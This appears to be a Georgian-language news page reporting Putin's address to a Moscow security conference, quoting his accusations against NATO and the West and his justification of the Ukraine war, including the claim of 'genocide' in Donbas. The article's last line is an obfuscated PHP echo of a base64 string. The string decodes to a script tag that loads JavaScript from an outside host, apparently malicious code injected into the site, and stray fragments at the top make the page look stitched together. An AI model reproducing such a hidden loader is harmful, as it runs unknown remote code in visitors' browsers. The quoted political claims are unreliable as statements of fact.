celsiusi
ავერსი შნაიდერი
კოლექტიური დასავლეთი მიზანმიმართულად ანადგურებს ევროპის უსაფრთხოების სისტემას და აყალიბებს ახალ სამხედრო ალიანსებს, - შესახებ რუსეთის პრეზიდენტმა მოსკოვის საერთაშორისო უსაფრთხოების რიგით მე-10 კონფერნეციისადმი ვიდეომიმართვაში განაცხადა.
 
პუტინმა განაცხადა, რომ ნატო აღმოსავლეთისკენ მოიწევს, ხოლო შეერთებული შტატები და მისი მოკავშირეები უხეშად ერევიან სუვერენული სახელმწიფოების საშინაო საქმეებში. 
 
"აწყობენ პროვოკაციებს, სახელმწიფო გადატრიალებას და სამოქალაქო ომებს, ცდილობენ ზეწოლა მოახდინონ დამოუკიდებელ სახელმწიფოებზე, რათა დაემორჩილონ მათ ნებას.
 
ეს ყველაფერი კეთდება ერთი მიზნით – შეინარჩუნოს თავისი დომინირება, მოდელი, რომელიც მთელ მსოფლიოში პარაზიტირების საშუალებას იძლევა“, – განაცხადა პუტინმა.
 
ვლადიმერ პუტინი უკრაინაში რუსეთის ომს შეეხო და განაცხადა, რომ სამხედრო ოპერაცია გაერო-ს წესდების შესაბამისად დაიწყო.
 
„უკრაინაში სპეციალური სამხედრო ოპერაციის ჩატარების გადაწყვეტილება მიღებულ იქნა გაერთიანებული ერების ორგანიზაციის წესდების სრული დაცვით. ამ ოპერაციის მიზნები მკაფიოდ და ზუსტად არის განსაზღვრული – ეს არის რუსეთისა და ჩვენი მოქალაქეების უსაფრთხოების უზრუნველყოფა, დონბასის მაცხოვრებლების გენოციდისგან დაცვა“, – განაცხადა რუსეთის პრეზიდენტმა.
544
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");